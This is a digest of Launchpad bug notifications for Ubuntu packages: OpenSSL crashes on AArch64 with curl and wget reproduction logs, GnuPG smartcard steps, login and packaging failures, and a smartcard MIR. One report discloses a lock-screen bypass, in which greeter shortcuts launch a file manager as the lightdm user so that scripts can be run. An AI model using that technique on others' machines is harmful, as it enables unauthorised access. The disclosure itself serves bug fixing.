  So far so good. But then there is error thereafter. Maybe this is a Ubuntu
  specific problem.

  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ sudo echo -n 1-7:1.0 >unbind
  bash: unbind: Permission denied
  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ sudo echo -n 1-7:1.1 >unbind
  bash: unbind: Permission denied 

  It turns out that I need to enable root to be able to do the job.
  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ sudo passwd root
  [sudo] password for mcuee:
  Enter new UNIX password:
  Retype new UNIX password:
  passwd: password updated successfully
  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ ls
  1-3:1.0  1-5:1.0  1-7:1.0  1-7:1.1  bind  module  new_id  uevent  unbind

  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ su -
  Password:
  root@Ubuntu804:~# cd /sys/bus/usb/drivers/usbhid/
  root@Ubuntu804:/sys/bus/usb/drivers/usbhid# ls
  1-3:1.0  1-5:1.0  1-7:1.0  1-7:1.1  bind  module  new_id  uevent  unbind
  root@Ubuntu804:/sys/bus/usb/drivers/usbhid# echo -n 1-7:1.0 >unbind
  root@Ubuntu804:/sys/bus/usb/drivers/usbhid# echo -n 1-7:1.1 >unbind

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/288964/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1953301] Re: Segfault on AArch64 caused by OpenSSL affecting numerous packages

2021-12-07 Thread Seth Arnold
This comment looks promising
https://github.com/mesonbuild/meson/issues/9690#issuecomment-986872688

It identifies https://github.com/openssl/openssl/pull/13256 and
https://github.com/openssl/openssl/pull/13218 as candidate fixes.

** Bug watch added: github.com/mesonbuild/meson/issues #9690
   https://github.com/mesonbuild/meson/issues/9690

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1953301

Title:
  Segfault on AArch64 caused by OpenSSL affecting numerous packages

Status in openssl package in Ubuntu:
  Incomplete

Bug description:
  OpenSSL causes crashes when reaching to some URLs on AArch64 platform,
  affecting Ubuntu, but not Fedora for instance.

  Initially reported in https://mediasoup.discourse.group/t/mediasoup-
  worker-default-make-failed/3647/12, more details and reproductions in
  https://github.com/mesonbuild/meson/issues/9690

  Affects curl, wget, python and probably everything else.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1953301/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1952548] Re: package libgdk-pixbuf2.0-0:i386 2.40.0+dfsg-3ubuntu0.2 failed to install/upgrade: el paquete está en un estado muy malo e inconsistente - debe reinstalarlo antes de

2021-11-29 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to gdk-pixbuf in Ubuntu.
https://bugs.launchpad.net/bugs/1952548

Title:
  package libgdk-pixbuf2.0-0:i386 2.40.0+dfsg-3ubuntu0.2 failed to
  install/upgrade: el paquete está en un estado muy malo e inconsistente
  - debe reinstalarlo  antes de intentar desinstalarlo.

Status in gdk-pixbuf package in Ubuntu:
  New

Bug description:
  System is onto an infinite bucle

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: libgdk-pixbuf2.0-0:i386 2.40.0+dfsg-3ubuntu0.2
  ProcVersionSignature: Ubuntu 5.11.0-40.44~20.04.2-generic 5.11.22
  Uname: Linux 5.11.0-40-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.21
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Sun Nov 28 09:15:56 2021
  DpkgTerminalLog:
   dpkg: error al procesar el paquete libgdk-pixbuf2.0-0:i386 
(--remove):
el paquete está en un estado muy malo e inconsistente - debe reinstalarlo
antes de intentar desinstalarlo.
   dpkg: demasiados errores, parando
  ErrorMessage: el paquete está en un estado muy malo e inconsistente - debe 
reinstalarlo  antes de intentar desinstalarlo.
  InstallationDate: Installed on 2021-11-19 (8 days ago)
  InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819)
  PackageArchitecture: i386
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.6
  SourcePackage: gdk-pixbuf
  Title: package libgdk-pixbuf2.0-0:i386 2.40.0+dfsg-3ubuntu0.2 failed to 
install/upgrade: el paquete está en un estado muy malo e inconsistente - debe 
reinstalarlo  antes de intentar desinstalarlo.
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gdk-pixbuf/+bug/1952548/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1951279] Re: OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

2021-11-18 Thread Seth Arnold
Ah, that's good for the health of your storage :)

Please follow up with the debug symbols and reproduction instructions.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1951279

Title:
  OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

Status in openssl package in Ubuntu:
  Incomplete

Bug description:
  Description
  ---

  It seems that current Ubuntu 20.04 (Focal) distribution for
  Arm64/Aarch64 raise a segmentation fault when certain validates some
  certificates.

  This issue affects only to Arm64/Aarch64 all the tools statically or
  dynamically linked with this version of the library are affected
  (Libcurl4, Curl, Wget, OpenJDK, Curl-PHP, etc).

  
  Environment and platform
  
  Linux 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:29:20 UTC 2021 aarch64 
aarch64 aarch64 GNU/Linux

  
  Steps to reproduce
  --

  1. Run:

  curl -v https://graph.facebook.com/v12.0/act_111/

  or

  wget https://graph.facebook.com/v12.0/act_111/

  
  Result received
  ---

  Segmentation fault (core dumped)

  
  Notes
  -

  This bug was found by the Curl users:
  See: https://github.com/curl/curl/issues/8024

  I believe that this bug is related to
  https://ubuntu.com/security/CVE-2020-1967 that maybe used as a vector
  point for code injection.

  Actually there isn't any replacement for OpenSSL 1.1.1f for Focal
  (Arm64), so it makes difficult to use Ubuntu 20.04 in a production
  environment.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1951279/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1951279] Re: OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

2021-11-17 Thread Seth Arnold
Hmm, something else to keep in mind: many aarch64 systems run on SD
cards or USB memory sticks and those are notorious garbage.

Is this a reasonable hard drive or is this cheap flash storage? Are
there messages in dmesg that might indicate filesystem or block storage
errors?

If this isn't a real hard drive then your debugging time is probably
better spent replacing the storage as a first effort.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1951279

Title:
  OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

Status in openssl package in Ubuntu:
  Incomplete

Bug description:
  Description
  ---

  It seems that current Ubuntu 20.04 (Focal) distribution for
  Arm64/Aarch64 raise a segmentation fault when certain validates some
  certificates.

  This issue affects only to Arm64/Aarch64 all the tools statically or
  dynamically linked with this version of the library are affected
  (Libcurl4, Curl, Wget, OpenJDK, Curl-PHP, etc).

  
  Environment and platform
  
  Linux 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:29:20 UTC 2021 aarch64 
aarch64 aarch64 GNU/Linux

  
  Steps to reproduce
  --

  1. Run:

  curl -v https://graph.facebook.com/v12.0/act_111/

  or

  wget https://graph.facebook.com/v12.0/act_111/

  
  Result received
  ---

  Segmentation fault (core dumped)

  
  Notes
  -

  This bug was found by the Curl users:
  See: https://github.com/curl/curl/issues/8024

  I believe that this bug is related to
  https://ubuntu.com/security/CVE-2020-1967 that maybe used as a vector
  point for code injection.

  Actually there isn't any replacement for OpenSSL 1.1.1f for Focal
  (Arm64), so it makes difficult to use Ubuntu 20.04 in a production
  environment.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1951279/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1951279] Re: OpenSSL 1.1.1f raise a segmentation faults on Arm64 builds

2021-11-17 Thread Seth Arnold
Can you provide more information on your environment and how to
reproduce this? I wasn't able to reproduce this on my rpi3b+ running
focal, with either libssl1.1 1.1.1f-1ubuntu2.8 or 1.1.1f-1ubuntu2.9:

First, 1.1.1f-1ubuntu2.8 installed:

$ curl -v https://graph.facebook.com/v12.0/act_111/
*   Trying 157.240.3.20:443...
* TCP_NODELAY set
* Connected to graph.facebook.com (157.240.3.20) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/certs/ca-certificates.crt
  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_CHACHA20_POLY1305_SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: C=US; ST=California; L=Menlo Park; O=Facebook, Inc.; 
CN=*.facebook.com
*  start date: Nov  4 00:00:00 2021 GMT
*  expire date: Feb  2 23:59:59 2022 GMT
*  subjectAltName: host "graph.facebook.com" matched cert's "*.facebook.com"
*  issuer: C=US; O=DigiCert Inc; OU=www.digicert.com; CN=DigiCert SHA2 High 
Assurance Server CA
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0xc4c9dee0)
> GET /v12.0/act_111/ HTTP/2
> Host: graph.facebook.com
> user-agent: curl/7.68.0
> accept: */*
> 
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 403 
< vary: Origin
< x-ad-account-usage: {"acc_id_util_pct":0}
< x-fb-rlafr: 0
< content-type: application/json; charset=UTF-8
< www-authenticate: OAuth "Facebook Platform" "insufficient_scope" "(#200) 
Provide valid app ID"
< access-control-allow-origin: *
< facebook-api-version: v12.0
< strict-transport-security: max-age=15552000; preload
< pragma: no-cache
< cache-control: no-store
< expires: Sat, 01 Jan 2000 00:00:00 GMT
< x-fb-request-id: AYFxZKGuw4Uidu_b6_RsyRn
< x-fb-trace-id: C1HBc2Oi1S3
< x-fb-rev: 1004746171
< x-fb-debug: 
yza+SwSrqD6mY1INQSyb5rcHmU89PziSoE3txYwg1BjWybYcgB36mUMVxq9bsRAJXZGkc34nNcSps5APpyG8QA==
< content-length: 125
< date: Wed, 17 Nov 2021 20:48:02 GMT
< alt-svc: h3=":443"; ma=3600, h3-29=":443"; ma=3600
< 
* Connection #0 to host graph.facebook.com left intact
{"error":{"message":"(#200) Provide valid app 
ID","type":"OAuthException","code":200,"fbtrace_id":"AYFxZKGuw4Uidu_b6_RsyRn"}}ubuntu@ubuntu:~
 $ wget https://graph.facebook.com/v12.0/act_111/
--2021-11-17 20:48:16--  https://graph.facebook.com/v12.0/act_111/
Resolving graph.facebook.com (graph.facebook.com)... 157.240.3.20, 
2a03:2880:f001:6:face:b00c:0:2
Connecting to graph.facebook.com (graph.facebook.com)|157.240.3.20|:443... 
connected.
HTTP request sent, awaiting response... 403 Forbidden
2021-11-17 20:48:16 ERROR 403: Forbidden.

ubuntu@ubuntu:~ 8 $


Next, 1.1.1f-1ubuntu2.9 installed:

ubuntu@ubuntu:~ 10s $ curl -v https://graph.facebook.com/v12.0/act_111/
*   Trying 157.240.3.20:443...
* TCP_NODELAY set
* Connected to graph.facebook.com (157.240.3.20) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/certs/ca-certificates.crt
  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_CHACHA20_POLY1305_SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: C=US; ST=California; L=Menlo Park; O=Facebook, Inc.; 
CN=*.facebook.com
*  start date: Nov  4 00:00:00 2021 GMT
*  expire date: Feb  2 23:59:59 2022 GMT
*  subjectAltName: host "graph.facebook.com" matched cert's "*.facebook.com"
*  issuer: C=US; O=DigiCert Inc; OU=www.digicert.com; CN=DigiCert SHA2 High 
Assurance Server CA
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0xf7766ee0)
> GET /v12.0/act_111/ HTTP/2
> Host: graph.facebook.com
> user-agent: curl/7.68.0
> accept: */*
> 
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 403 
< 

[Touch-packages] [Bug 1921518] Re: OpenSSL "double free" error

2021-11-15 Thread Seth Arnold
** Attachment added: "archive grep for CONF_modules_load_file"
   
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1921518/+attachment/5541087/+files/openssl-conf-modules-load-file-15-10%3A46%3A37.gz

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to wget in Ubuntu.
https://bugs.launchpad.net/bugs/1921518

Title:
  OpenSSL "double free" error

Status in openssl package in Ubuntu:
  Incomplete
Status in wget package in Ubuntu:
  Fix Released
Status in openssl source package in Focal:
  Incomplete
Status in wget source package in Focal:
  Fix Committed

Bug description:
  [Impact]
  openssl config file is being loaded twice, causing engines to be loaded twice 
if specified therein, causing double free errors and other strange behavior.

  [Test plan]
  Run the command of the package being tested in

  gdb  -ex "break CONF_modules_load_file" -ex "run" --args

  and make sure it only breaks one.

  Regression test:

  In default Ubuntu configuration, either no openssl configuration is provided, 
or it contains no settings that affect wget. This code path changes how/when 
openssl configuration is loaded and used by openssl. One should verify that:
  1) wget continues to work without openssl.cnf
  2) wget continues to work with stock ubuntu unmodified openssl.cnf
  3) wget continue to honor and use custom TLS settings that one may have 
specified in openssl.cnf (for example custom engine)

  
  [Where problems could occur]

  wget: This is an upstream change that changes initialization and is in
  use in later releases. Since it mostly removes an unneeded call to the
  load file function, a regression could be a config file being ignored,
  but it seems unlikely given the use in later releases

  
  [Original bug report]
  "double free" error is seen when using curl utility. Error is from 
libcrypto.so which is part of the OpenSSL package. This happens only when 
OpenSSL is configured to use a dynamic engine.

  OpenSSL version is 1.1.1f

  The issue is not encountered if
  http://www.openssl.org/source/openssl-1.1.1f.tar.gz is used instead.

  OpenSSL can be configured to use a dynamic engine by editing the
  default openssl config file which is located at '/etc/ssl/openssl.cnf'
  on Ubuntu systems.

  On Bluefield systems, config diff to enable PKA dynamic engine, is as
  below:

  +openssl_conf = conf_section
  +
   # Extra OBJECT IDENTIFIER info:
   #oid_file  = $ENV::HOME/.oid
   oid_section= new_oids

  +[ conf_section ]
  +engines = engine_section
  +
  +[ engine_section ]
  +bf = bf_section
  +
  +[ bf_section ]
  +engine_id=pka
  +dynamic_path=/usr/lib/aarch64-linux-gnu/engines-1.1/pka.so
  +init=0
  +

  engine_id above refers to dynamic engine name/identifier.
  dynamic_path points to the .so file for the dynamic engine.

  # curl -O https://tpo.pe/pathogen.vim

  double free or corruption (out)

  Aborted (core dumped)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1921518/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1950201] Re: Gnugpg does not offer the option to store the private and public keys on two different keycards.

2021-11-08 Thread Seth Arnold
This guide describes how to make a copy of gnupg files in order to
create a duplicate card:

https://zach.codes/ultimate-yubikey-setup-guide/

It would be nice if such a guide weren't necessary.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to gnupg in Ubuntu.
https://bugs.launchpad.net/bugs/1950201

Title:
  Gnugpg does not offer the option to store the private and public keys
  on two different keycards.

Status in gnupg package in Ubuntu:
  New

Bug description:
  Gnugpg does not offer the option to store the private and public keys
  on two different keycards.

  I have followed the official yubikey guide as follows, but it might
  apply to similar smart cards and USB tokens:

  To import the key on your YubiKey:

  Insert the YubiKey into the USB port if it is not already plugged
  in.

  Enter the GPG command: gpg --edit-key 1234ABC (where 1234ABC is
  the key ID of your key)

  Enter the command: keytocard

  When prompted if you really want to move your primary key, enter y
  (yes).

  When prompted where to store the key, select 1. This will move the
  signature subkey to the PGP signature slot of the YubiKey.

  Enter the command: key 1
  Enter the command: keytocard

  When prompted where to store the key, select 2. This will move the
  encryption subkey to the YubiKey.

  Enter the command: key 1

  Enter the command: key 2

  Enter the command: keytocard

  When prompted where to store the key, select 3. This will move the
  authentication subkey to the YubiKey.

  Enter the command: quit
  When prompted to save your changes, enter y (yes). You have now saved 
your keyring to your YubiKey.

  The issue with that is that it permanently moves the secret keys to
  the yubikey or similar, and that causes issues later if one wants to
  create backup keys.

  If one saves the changes and tries to make a separate identical key
  card at a later date, one gets the "gpg: KEYTOCARD failed: Unusable
  secret key." error.

  I have read that if one presses control and c ( on Linux ) it  after the last 
keytocard and option 3, the secret keys will not be deleted from the computer, 
only copied.
  One then can start forward again at this step: gpg --edit-key 1234ABC (where 
1234ABC is the key ID of your key). Another possible but tedious workaround is 
to backup the secret keys and public keys,
  and import those back into gpg, then move they keys to a physical backup key.

  ( Note: Key 0 is the primary signature subkey. Key 1is the encryption
  subkey. key 2 is the authentication subkey .)

  
  Ideally, there should be a option in the gpg menu about this, that asks about 
permanently moving the keys.

  A nice addition would be:

  Do you want to make a separate identical key card?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnupg/+bug/1950201/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1812095] Re: console login loop after entering username followed by RETURN

2021-10-27 Thread Seth Arnold
*** This bug is a duplicate of bug 1813873 ***
https://bugs.launchpad.net/bugs/1813873

daniel-sokolov, this bug was fixed in Ubuntu kernels two and a half
years ago. Do you really have such an old kernel? I suggest asking for
help in Mint support channels -- hopefully someone can walk you through
installing a newer kernel through a rescue system.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1812095

Title:
  console login loop after entering username followed by RETURN

Status in shadow package in Ubuntu:
  Confirmed

Bug description:
   login: 
  password:

  Just do nothing. About two seconds later ...

  login:
  password:

  login:
  password:

  login:
  password:

  After this being displayed three times:

  "Too many failure" or so and login is restarting.

  You cant login at all. Only solution: clear the password for the
  account you want to login with.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.10
  Package: login 1:4.5-1ubuntu1
  ProcVersionSignature: Ubuntu 4.18.0-14.15-generic 4.18.20
  Uname: Linux 4.18.0-14-generic x86_64
  ApportVersion: 2.20.10-0ubuntu13.1
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Wed Jan 16 19:34:30 2019
  InstallationDate: Installed on 2011-10-19 (2645 days ago)
  InstallationMedia: Xubuntu 11.10 "Oneiric Ocelot" - Release amd64 (20111012)
  SourcePackage: shadow
  UpgradeStatus: Upgraded to cosmic on 2018-11-03 (74 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1812095/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1948339] Re: Logon screen can be bypassed using various shortcuts

2021-10-21 Thread Seth Arnold
Your daughter does good work :)

Thanks

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1948339

Title:
  Logon screen can be bypassed using various shortcuts

Status in Ubuntu MATE:
  New
Status in arctica-greeter package in Ubuntu:
  New
Status in lightdm package in Ubuntu:
  New
Status in mate-settings-daemon package in Ubuntu:
  New

Bug description:
  Hi,

  my little daughter discovered a logon screen bypass in Ubuntu Mate
  21.10 after hitting the keyboard for a while.

  It turns out that several keyboard shortcuts are allowed while Ubuntu
  Mate is locked (arctica-greeter):

  - Mod4 + S (mate-search-tool)
  - Mod4 + E (Open Caja / File Explorer)
  - CTRL + Shift + Esc (mate-system-monitor)
  - PRNT (Screenshot)

  All of the mentioned shortcuts could be used to spawn a file explorer
  (Caja) or various other binaries as user "lightdm", who owns the logon
  screen.

  Although an interactive terminal like mate-terminal, xterm, lxterm
  etc. could not be opened directly, there are various options to run
  commands as the lightdm user, for example by creating a shell script
  using "caja", and execute it directly using the GUI.

  I've attached Proof-of-Concept GIFs for all shortcuts mentioned above.
  There might be additional shortcuts that could be used to achieve the
  same, however I'm not aware about every shortcut that is configured,
  but I suppose that the root cause is located somewhere in arctica-
  greeter, rather than within every single binary launched by shortcuts.

  The bug was reproduced on a fresh installation of Ubuntu Mate 21.10. I
  haven't tested other versions of Ubuntu Mate yet.

  Please find additional version details below:

  $ apt-cache policy lightdm

  lightdm:
    Installed: 1.30.0-0ubuntu4
    Candidate: 1.30.0-0ubuntu4
    Version table:
   *** 1.30.0-0ubuntu4 500
  500 http://de.archive.ubuntu.com/ubuntu impish/universe amd64 Packages
  100 /var/lib/dpkg/status

  $ apt-cache policy arctica-greeter

  arctica-greeter:
    Installed: 0.99.1.5-2nmu1
    Candidate: 0.99.1.5-2nmu1
    Version table:
   *** 0.99.1.5-2nmu1 500
  500 http://de.archive.ubuntu.com/ubuntu impish/universe amd64 Packages
  100 /var/lib/dpkg/status

  Thanks,
  Basti

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu-mate/+bug/1948339/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1947526] Re: can't run associated docker-compose

2021-10-18 Thread Seth Arnold
Hello Andrew, I don't understand what exactly is broken; your logs show
a lot of AppArmor profiles loading without trouble.

What are you trying to do? What's going wrong?

Thanks

** Changed in: apparmor (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1947526

Title:
  can't run associated docker-compose

Status in apparmor package in Ubuntu:
  Incomplete

Bug description:
  I can't seem to get apparmor to run at all, even sudo rm and sudo
  restart in the /etc/init.d/apparmor

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: apparmor 2.13.3-7ubuntu5.1
  ProcVersionSignature: Ubuntu 5.11.0-37.41~20.04.2-generic 5.11.22
  Uname: Linux 5.11.0-37-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.20
  Architecture: amd64
  CasperMD5CheckResult: skip
  CurrentDesktop: ubuntu:GNOME
  Date: Sun Oct 17 17:56:59 2021
  InstallationDate: Installed on 2021-08-31 (47 days ago)
  InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-5.11.0-37-generic 
root=UUID=ca77035a-d2b3-4803-a4e1-333e95d847fb ro quiet splash
  SourcePackage: apparmor
  Syslog:
   
  UpgradeStatus: No upgrade log present (probably fresh install)
  modified.conffile..etc.apparmor.d.abstractions.mysql: [deleted]
  modified.conffile..etc.apparmor.parser.conf: [deleted]

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1947526/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1947394] Re: package ca-certificates 20210119ubuntu0.21.04.1 failed to install/upgrade: triggers looping, abandoned

2021-10-15 Thread Seth Arnold
** Package changed: ca-certificates (Ubuntu) => ubuntu-release-upgrader
(Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1947394

Title:
  package ca-certificates 20210119ubuntu0.21.04.1 failed to
  install/upgrade: triggers looping, abandoned

Status in ubuntu-release-upgrader package in Ubuntu:
  New

Bug description:
  failed on upgrade to 21.10 on machine with AMD GPUs

  ProblemType: Package
  DistroRelease: Ubuntu 21.04
  Package: ca-certificates 20210119ubuntu0.21.04.1
  Uname: Linux 5.11.0-051100-generic x86_64
  ApportVersion: 2.20.11-0ubuntu65.3
  Architecture: amd64
  CasperMD5CheckResult: unknown
  Date: Fri Oct 15 11:24:28 2021
  ErrorMessage: triggers looping, abandoned
  InstallationDate: Installed on 2020-12-18 (301 days ago)
  InstallationMedia: Ubuntu 20.04.1 LTS "Focal Fossa" - Release amd64 (20200731)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.9, Python 3.9.5, python3-minimal, 3.9.4-1
  PythonDetails: N/A
  RebootRequiredPkgs: Error: path contained symlinks.
  RelatedPackageVersions:
   dpkg 1.20.9ubuntu1
   apt  2.2.4ubuntu0.1
  SourcePackage: ca-certificates
  Title: package ca-certificates 20210119ubuntu0.21.04.1 failed to 
install/upgrade: triggers looping, abandoned
  UpgradeStatus: Upgraded to hirsute on 2021-10-15 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ubuntu-release-upgrader/+bug/1947394/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1892559] Re: [MIR] ccid opensc pcsc-lite

2021-10-05 Thread Seth Arnold
Now that the security team has some new hires, we're looking at reviving
this series of tasks. Looking through the bug I have come up with the
following outstanding items:

- Add a .symbols file to opensc
- try to add vsmartcard-vpicc + vsmartcard-vpcd autopkgtests
- a formal list of 'supported cards' that we will test with and expect to work
- try to address the awkward path of libraries, /lib/pam_pkcs11/
- make pcscd not run as root 
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930530

Did I overlook anything?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pcsc-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1892559

Title:
  [MIR] ccid opensc pcsc-lite

Status in ccid package in Ubuntu:
  New
Status in opensc package in Ubuntu:
  Incomplete
Status in pam-pkcs11 package in Ubuntu:
  Invalid
Status in pcsc-lite package in Ubuntu:
  New
Status in pcsc-perl package in Ubuntu:
  Invalid
Status in pcsc-tools package in Ubuntu:
  Invalid

Bug description:
  ==> ccid <==
  [Availability]
  ccid is in universe, and builds on all architectures.

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  No CVEs for ccid are listed in our database.
  Doesn't appear to bind to a socket.
  No privileged executables, but does have udev rules.
  Probably needs a security review.

  [Quality assurance]
  No test suite.
  Does require odd hardware that we'll probably need to buy.
  I don't see debconf questions.
  ccid is well maintained in Debian by upstream author.
  One open wishlist bug in BTS, harmless.

  One open bug in launchpad, not security, but looks very frustrating
